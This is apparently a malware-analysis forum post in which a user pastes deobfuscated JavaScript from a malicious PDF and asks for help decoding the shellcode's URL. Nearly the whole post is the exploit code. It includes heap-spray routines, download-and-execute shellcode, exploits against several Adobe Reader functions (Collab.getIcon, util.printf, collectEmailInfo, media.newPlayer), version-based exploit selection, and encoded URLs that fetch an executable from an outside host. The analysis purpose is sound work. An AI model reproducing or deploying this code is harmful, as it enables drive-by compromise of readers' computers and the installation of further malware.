I received a malicious pdf, I tried both the automated system "wepawet" & "jsunpack". Finally I used "malwaretracker.com" to know about the streams which are available in the Pdf file.
function yeqiupve(btiegea)
{
var uaueeuio = '';
var efyliefq = '';
for(tfaeopiul=0;
tfaeopiul<btiegea.length;
tfaeopiul++)
{
var aeeoeyu = btiegea.charAt(tfaeopiul);
if(aeeoeyu == uaueeuio)
{
}
else
{
efyliefq+=aeeoeyu;
}
}
return efyliefq;
}
var uxivqia = yeqiupve("\r\n\r\nfunction shcode(url)\r\n
{
\r\n\r\nsh = \"%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455\";
\r\nreturn sh+url;
\r\n
}
\r\n\r\nfunction nplayer()
{
\r\nfunction kbve()\r\n
{
\r\nvar eobe=\"p@111111111111111111111111 : yyyy111\";
\r\nutil.printd(eobe, ne Date());
\r\n
}
\r\n\r\nvar grix=12000;
\r\njucobu=ne Array();
\r\nvar klkng = \"%u9090%u9090\";
\r\nvar hjnalb8=shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u6E28%u7765%u6C50%u7961%u7265%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\");
\r\nklkng=unescape(klkng);
\r\nhjnalb8=unescape(hjnalb8);
\r\n\r\nhile(klkng.length <= 0x8000)
{
klkng+=klkng;
}
\r\nklkng=klkng.substr(0,0x8000 - hjnalb8.length);
\r\nfor(ffam=0;
ffam<grix;
ffam++)
{
jucobu[ffam]=klkng + hjnalb8;
}
\r\nif(grix)
{
kbve();
kbve();
try
{
this.media.nePlayer(null);
}
catch(e)
{
}
kbve();
}
\r\n
}
\r\n\r\nfunction printf()
{
\r\n\r\nvar payload=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u7028%u6972%u746E%u2966%u6B26%u7965%u383D%u6434%u3334%u3333%u3039%u6362%u3232%u6536%u6132%u3638%u3438%u3734%u6432%u3962%u6431%u3938%u0032\"));
\r\n\r\nvar nop =\"\";
\r\nfor (iCnt=128;
iCnt>=0;
--iCnt) nop += unescape(\"%u9090%u9090%u9090%u9090%u9090\");
\r\nheapblock = nop + payload;
\r\nbigblock = unescape(\"%u9090%u9090\");
\r\nheadersie = 20;
\r\nspray = headersie+heapblock.length;
\r\nhile (bigblock.length<spray) bigblock+=bigblock;
\r\nfillblock = bigblock.substring(0, spray);
\r\nblock = bigblock.substring(0, bigblock.length-spray);
\r\nhile(block.length+spray < 0x40000) block = block+block+fillblock;
\r\nmem = ne Array();
\r\nfor (i=0;
i<1400;
i++) mem = block + heapblock;
\r\n\r\nvar num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888\r\nutil.printf(\"%45000f\",num);
\r\n
}
\r\n\r\nfunction geticon()
{
\r\n\r\nvar shellcode=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u4728%u7465%u6349%u6E6F%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\"));
\r\n\r\ngarbage = unescape(\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\") + shellcode;
\r\nnopblock = unescape(\"%u9090%u9090\");
\r\nheadersie = 10;
\r\nacl = headersie+garbage.length;
\r\n\r\nhile (nopblock.length<acl) nopblock+=nopblock;
\r\nfillblock = nopblock.substring(0, acl);
\r\nblock = nopblock.substring(0, nopblock.length-acl);
\r\nhile(block.length+acl<0x40000) block = block+block+fillblock;
\r\nmemory = ne Array();
\r\nfor (i=0;
i<180;
i++) memory = block + garbage;
\r\nvar buffersie = 4012;
\r\nvar buffer = Array(buffersie);
\r\nfor (i=0;
i<buffersie;
i++)\r\n
{
\r\nbuffer = unescape(\"%0a%0a%0a%0a\");
\r\n
}
\r\n\r\nCollab.getIcon(buffer+\"_N.bundle\");
\r\n
}
\r\n\r\nfunction collab()
{
\r\n\r\nfunction fix_it(yarsp,len)
{
\r\nhile(yarsp.length*2<len)
{
yarsp+=yarsp;
}
\r\nyarsp=yarsp.substring(0,len/2);
\r\nreturn yarsp;
}
\r\nvar shellcode=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u4328%u6C6F%u616C%u2962%u6B26%u7965%u383D%u6434%u3334%u3333%u3039%u6362%u3232%u6536%u6132%u3638%u3438%u3734%u6432%u3962%u6431%u3938%u0032\"));
\r\nvar mem_array=ne Array();
\r\nvar cc=0x0c0c0c0c;
\r\nvar addr=0x400000;
\r\nvar sc_len=shellcode.length*2;
\r\nvar len=addr-(sc_len+0x38);
\r\nvar yarsp=unescape(\"%u9090%u9090\");
\r\nyarsp=fix_it(yarsp,len);
\r\nvar count2=(cc-0x400000)/addr;
\r\nfor(var count=0;
count<count2;
count++)
{
mem_array[count]=yarsp+shellcode;
}
\r\nvar overflo=unescape(\"%u0c0c%u0c0c\");
\r\nhile(overflo.length<44952)
{
overflo+=overflo;
}
\r\nthis.collabStore=Collab.collectEmailInfo(
{
subj:\"\",msg:overflo
}
);
\r\n\r\n
}
\r\n\r\naPlugins = app.plugIns;
\r\nvar sv=parseInt(app.vieerVersion.toString().charAt(0));
\r\nfor (var i=0;
i < aPlugins.length;
i++)\r\n
{
\r\n if (aPlugins.name==\"EScript\")\r\n
{
\r\n var lv=aPlugins.version;
\r\n
}
\r\n
}
\r\nif ((lv==9)||((sv==8)&&(lv<=8.12)))\r\n
{
\r\n geticon();
\r\n
}
\r\nelse if (lv==7.1)\r\n
{
\r\n printf();
\r\n
}
\r\nelse if (((sv==6)||(sv==7))&&(lv<7.11))\r\n
{
\r\n collab();
\r\n
}
\r\nelse if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))\r\n
{
\r\n nplayer();
\r\n
}
\r\n\r\n");
loeiize = ''+uxivqia+'';
var kyvxga = 500;
var egoioany = '';
aruibdoxy0 = loeiize;
for(mauojbqob=0;
mauojbqob<kyvxga;
mauojbqob++)
{
var ghsd = mauojbqob+1;
egoioany+='var aruibdoxy'+ghsd+' = aruibdoxy'+mauojbqob+';
';
this['ev'+'al'](egoioany);
}
this['eva'+'l']('this[\'eva\'+\'l\'](aruibdoxy'+kyvxga+');
');
I believe the shellcode would be
%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455\
"Heap Spray" concept is used here and i am not sure about the URL of the shellcode. Please help me to find out URL!
Thanks
MAD
Topic: Wepawet failed to Decode ! (Read 4475 times)